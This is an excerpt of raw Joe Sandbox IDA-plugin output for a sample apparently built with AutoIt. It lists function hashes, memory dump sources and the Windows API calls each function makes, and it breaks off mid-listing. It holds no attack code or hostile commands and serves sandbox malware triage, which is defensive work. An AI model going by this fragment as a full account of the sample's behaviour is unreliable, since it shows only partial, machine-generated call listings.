                          • API String ID: 839392675-0
                          • Opcode ID: 0f5cf283fb1914b39d29c2cc53030dc2f7aab5c86700b6802ad45b9843cee111
                          • Instruction ID: 40295c9ec278f963dfeb74a33a8f884e5641ab3fb7ce65a8ebb8be3258b658cd
                          • Opcode Fuzzy Hash: 0f5cf283fb1914b39d29c2cc53030dc2f7aab5c86700b6802ad45b9843cee111
                          • Instruction Fuzzy Hash: A3F054B2140558BBEB2257529C0EEEF3E7CEFCAB11F00815AF601D1191D7A85A02C6BD
                          APIs
                          • GetClientRect.USER32(?), ref: 00757452
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00757469
                          • GetWindowDC.USER32(?), ref: 00757475
                          • GetPixel.GDI32(00000000,?,?), ref: 00757484
                          • ReleaseDC.USER32(?,00000000), ref: 00757496
                          • GetSysColor.USER32(00000005), ref: 007574B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                          • String ID:
                          • API String ID: 272304278-0
                          • Opcode ID: 07d9feae5ee18715a86383b64ddae2b38a9b392bb4a762882c1bf61a515c7310
                          • Instruction ID: cba0de6d39c14a81aef13f5ac336b4c2bcfbf66fca1a615e9843ecd1db40d3ac
                          • Opcode Fuzzy Hash: 07d9feae5ee18715a86383b64ddae2b38a9b392bb4a762882c1bf61a515c7310
                          • Instruction Fuzzy Hash: FC018B31400205EFDF125FA4EC08BEA7BB5FB04312F618061FD16A20A0CB391E52EB14
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076187F
                          • UnloadUserProfile.USERENV(?,?), ref: 0076188B
                          • CloseHandle.KERNEL32(?), ref: 00761894
                          • CloseHandle.KERNEL32(?), ref: 0076189C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007618A5
                          • HeapFree.KERNEL32(00000000), ref: 007618AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: 2e4bc78b6f149739e97d4387f7ba9f1379b43478f71a99704492785fdf2f4f07
                          • Instruction ID: 0692fca6edbaf5f2ea2c52ba089938dd66798c3a63175f5ecc3a994bb0d49766
                          • Opcode Fuzzy Hash: 2e4bc78b6f149739e97d4387f7ba9f1379b43478f71a99704492785fdf2f4f07
                          • Instruction Fuzzy Hash: 66E0E576044905BBDF025FA1EE0D90ABF39FF49B22B10C222F22581170CB369822DF69
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0070BEB3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: D%}$D%}$D%}$D%}D%}
                          • API String ID: 1385522511-1153134958
                          • Opcode ID: d308375ec324788d5974918b83c4de1ae3e6169980bb15091b65a13fcca90a61
                          • Instruction ID: 9a312cd0bea1436955fa6bc28194ba46ed948c3373ad3b2f5638721379daf9d8
                          • Opcode Fuzzy Hash: d308375ec324788d5974918b83c4de1ae3e6169980bb15091b65a13fcca90a61
                          • Instruction Fuzzy Hash: 20913075A00205DFCB14CF58C090AAAB7F1FF58314F24866ED545A7391E739EE92CBA0
                          APIs
                            • Part of subcall function 00720242: EnterCriticalSection.KERNEL32(007D070C,007D1884,?,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072024D
                            • Part of subcall function 00720242: LeaveCriticalSection.KERNEL32(007D070C,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072028A
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9
                          • __Init_thread_footer.LIBCMT ref: 00787BFB
                            • Part of subcall function 007201F8: EnterCriticalSection.KERNEL32(007D070C,?,?,00718747,007D2514), ref: 00720202
                            • Part of subcall function 007201F8: LeaveCriticalSection.KERNEL32(007D070C,?,00718747,007D2514), ref: 00720235
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                          • String ID: +Tu$5$G$Variable must be of type 'Object'.
                          • API String ID: 535116098-335167736
                          • Opcode ID: a470c5829a32b918c7239afa55d4aa050e6aaceac83add1a9cece52ad5423a19
                          • Instruction ID: 9b2cbe70e27cdab42dfe82c8e4aed52e060b57e192105b53d4dd0caa576cab47
                          • Opcode Fuzzy Hash: a470c5829a32b918c7239afa55d4aa050e6aaceac83add1a9cece52ad5423a19
                          • Instruction Fuzzy Hash: A3918C70A44209EFCB18EF54D895DADB7B6FF44300F248059F806AB292DB79EE41DB61
                          APIs
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0076C6EE
                          • _wcslen.LIBCMT ref: 0076C735
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0076C79C
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0076C7CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ItemMenu$Info_wcslen$Default
                          • String ID: 0
                          • API String ID: 1227352736-4108050209
                          • Opcode ID: a7b69de47c96181c2757053a5be6489f6838f114b3feac879fc81e58209273e5
                          • Instruction ID: 59c685cf19b8ed2f30227f3e378eced7c909f096f313aac80d64473f7bd6e8c6
                          • Opcode Fuzzy Hash: a7b69de47c96181c2757053a5be6489f6838f114b3feac879fc81e58209273e5
                          • Instruction Fuzzy Hash: C151DF71604301ABD7129F28C889A7B77E8AF49310F040A2EFDD6D31D1DB6CE8049B56
                          APIs
                          • ShellExecuteExW.SHELL32(0000003C), ref: 0078AEA3
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                          • GetProcessId.KERNEL32(00000000), ref: 0078AF38
                          • CloseHandle.KERNEL32(00000000), ref: 0078AF67
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseExecuteHandleProcessShell_wcslen
                          • String ID: <$@
                          • API String ID: 146682121-1426351568
                          • Opcode ID: f1f0e26d62c52d078ff517d2d649d3fb645d606e3ab276367872501caeeca467
                          • Instruction ID: 5afe0dd66e83025001399675d725c297426ea8fa21088735584c7f18829085bf
                          • Opcode Fuzzy Hash: f1f0e26d62c52d078ff517d2d649d3fb645d606e3ab276367872501caeeca467
                          • Instruction Fuzzy Hash: 54717C71A00615EFDB14EF54C489A9EBBF0FF08314F04859AE816AB392CB78ED45CB91
                          APIs
                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00767206
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0076723C
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0076724D
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007672CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: e0867ab4ead4522b4b1385ed5fdd7b34441f7a40902cca7d80c2e3d6f9b798d5
                          • Instruction ID: f399c186d8defa7456c82c5b9533c5a8d9e609e0afac075019d2bc69c8a6f100
                          • Opcode Fuzzy Hash: e0867ab4ead4522b4b1385ed5fdd7b34441f7a40902cca7d80c2e3d6f9b798d5
                          • Instruction Fuzzy Hash: 304171B1604204DFDB19CF54C894A9A7BB9FF44358F1480ADFD069F20AD7B8D945DBA0
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00793E35
                          • IsMenu.USER32(?), ref: 00793E4A
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00793E92
                          • DrawMenuBar.USER32 ref: 00793EA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert
                          • String ID: 0
                          • API String ID: 3076010158-4108050209
                          • Opcode ID: 6a67a10f9aaae9b719fce7f1a5e0950ad19d615b9b07ab07cd482a0d1a751109
                          • Instruction ID: 061278b8dc842480a3c901c7af5b68910cef03920d7d0ea621b1180ea54579c8
                          • Opcode Fuzzy Hash: 6a67a10f9aaae9b719fce7f1a5e0950ad19d615b9b07ab07cd482a0d1a751109
                          • Instruction Fuzzy Hash: 30414775A01209EFDF10DF60E884AAABBB9FF49354F04812AE915A7250D738AE55CF60
                          APIs
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00792F8D
                          • LoadLibraryW.KERNEL32(?), ref: 00792F94
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00792FA9
                          • DestroyWindow.USER32(?), ref: 00792FB1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyLibraryLoadWindow
                          • String ID: SysAnimate32
                          • API String ID: 3529120543-1011021900
                          • Opcode ID: 07ea52542ecd16366e8b693245a0d7a1583ac76e9adb867aedea80171f7f9c41
                          • Instruction ID: e45bcefe53b0b93e1a24a4ff56c02263f2d02853de0732165bfc7a3d70a69b33
                          • Opcode Fuzzy Hash: 07ea52542ecd16366e8b693245a0d7a1583ac76e9adb867aedea80171f7f9c41
                          • Instruction Fuzzy Hash: 2021DC72200205BBEF11AF64EC84EBB37BAEB59364F104619FA10D20A1C739DC529760
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00724D1E,007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002), ref: 00724D8D
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00724DA0
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00724D1E,007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000), ref: 00724DC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 1f715678d3a695519a48a5b1fa1e816c33a3cac547a9238715aea70777c166e8
                          • Instruction ID: 4714ab172d48202ce9e7916c5f8894fdef7fcdd5b8a92c7233ede26fc21afe29
                          • Opcode Fuzzy Hash: 1f715678d3a695519a48a5b1fa1e816c33a3cac547a9238715aea70777c166e8
                          • Instruction Fuzzy Hash: 56F0C230A40218FBDF129F90EC09BADBFB5EF44711F0041A9F909A2260CB385D41CBD8
                          APIs
                          • LoadLibraryA.KERNEL32 ref: 0075D3AD
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0075D3BF
                          • FreeLibrary.KERNEL32(00000000), ref: 0075D3E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: GetSystemWow64DirectoryW$X64
                          • API String ID: 145871493-2590602151
                          • Opcode ID: 8fb525ce18f5eeffcb2682a3d02870af5f5510c9ecc66e88f9a92a46ea4fbc0d
                          • Instruction ID: de8912ead2b987508069be131d05be4e6d50c6533e9e31042ea03fe2b3f30d32
                          • Opcode Fuzzy Hash: 8fb525ce18f5eeffcb2682a3d02870af5f5510c9ecc66e88f9a92a46ea4fbc0d
                          • Instruction Fuzzy Hash: 6CF0E5B1546A21DBDB3267109C589E97325BF10703F94816AFC06E2154DBECCD8CCA9B
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E9C
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00704EAE
                          • FreeLibrary.KERNEL32(00000000,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-3689287502
                          • Opcode ID: 618acca74e8412adc6cd57be64a554fe5bdb26cada00321f248fccaac7ba94e5
                          • Instruction ID: 90aa4b75424f817659626158c9a9da03629ae0b755cab093622809a9f8ad93a6
                          • Opcode Fuzzy Hash: 618acca74e8412adc6cd57be64a554fe5bdb26cada00321f248fccaac7ba94e5
                          • Instruction Fuzzy Hash: A1E0CDF5A415229BD6331725FC18B5F7694AF81F627054216FD04D3150DB6CCD0340EC
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E62
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00704E74
                          • FreeLibrary.KERNEL32(00000000,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 145871493-1355242751
                          • Opcode ID: 07e5e1846551f768b259f5e91e55f756d7661e31200a68f09cb77e2f932ab04e
                          • Instruction ID: 811d7078318274e1d50dce03e914b3caa78dc1b69375c96fd1e8291ba2380e32
                          • Opcode Fuzzy Hash: 07e5e1846551f768b259f5e91e55f756d7661e31200a68f09cb77e2f932ab04e
                          • Instruction Fuzzy Hash: 58D0C2B154262197CE231B24BC08E8B2A58AF81B11305825ABA08A2190CF2CCD0281D8
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 0078A427
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0078A435
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0078A468
                          • CloseHandle.KERNEL32(?), ref: 0078A63D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CloseCountersCurrentHandleOpen
                          • String ID:
                          • API String ID: 3488606520-0
                          • Opcode ID: c5f08772b39a9a03649a4166f7bfe5bd4e31a038b7cb7bad9eaa1bdcfae7ca56
                          • Instruction ID: f8fad2e1d4e6980dd9bd6bd259257e0959049822c439ae14bdf3004d80d20827
                          • Opcode Fuzzy Hash: c5f08772b39a9a03649a4166f7bfe5bd4e31a038b7cb7bad9eaa1bdcfae7ca56
                          • Instruction Fuzzy Hash: 60A1B371644301EFE720EF18C886F2AB7E1AF44714F14895DF9599B2D2DBB4EC418B92
                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007A3700), ref: 0073BB91
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0073BC09
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D1270,000000FF,?,0000003F,00000000,?), ref: 0073BC36
                          • _free.LIBCMT ref: 0073BB7F
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073BD4B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID:
                          • API String ID: 1286116820-0
                          • Opcode ID: 5e8226753e35a1c32934fcbf29acac36d3b715b95f95f3813cfcb66a398a00ec
                          • Instruction ID: bac40bd7aa8541df28e7fc677f3034bd5546bc63c19c0fb4294eea050f608eec
                          • Opcode Fuzzy Hash: 5e8226753e35a1c32934fcbf29acac36d3b715b95f95f3813cfcb66a398a00ec
                          • Instruction Fuzzy Hash: 8351E7B1A00219EFEB20EF659C8596AB7BCFF40310F50426BE654D7293EB385E41CB64
                          APIs
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0076CF22,?), ref: 0076DDFD
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0076CF22,?), ref: 0076DE16
                            • Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A
                          • lstrcmpiW.KERNEL32(?,?), ref: 0076E473
                          • MoveFileW.KERNEL32(?,?), ref: 0076E4AC
                          • _wcslen.LIBCMT ref: 0076E5EB
                          • _wcslen.LIBCMT ref: 0076E603
                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0076E650
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                          • String ID:
                          • API String ID: 3183298772-0
                          • Opcode ID: a714a2c2da3f8ce65dedd3b61ca3fda0d217f34d985d569281fc90b929622cd9
                          • Instruction ID: ecc91e904acd14da7229513a3ccd936331f68caf4d283c373e0fbe6a6ffd035c
                          • Opcode Fuzzy Hash: a714a2c2da3f8ce65dedd3b61ca3fda0d217f34d985d569281fc90b929622cd9
                          • Instruction Fuzzy Hash: BC5166B2508385DBC724DBA0DC859DF77DCAF85340F00491EFA8AD3191EF78A5888766
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078BAA5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078BB00
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0078BB63
                          • RegCloseKey.ADVAPI32(?,?), ref: 0078BBA6
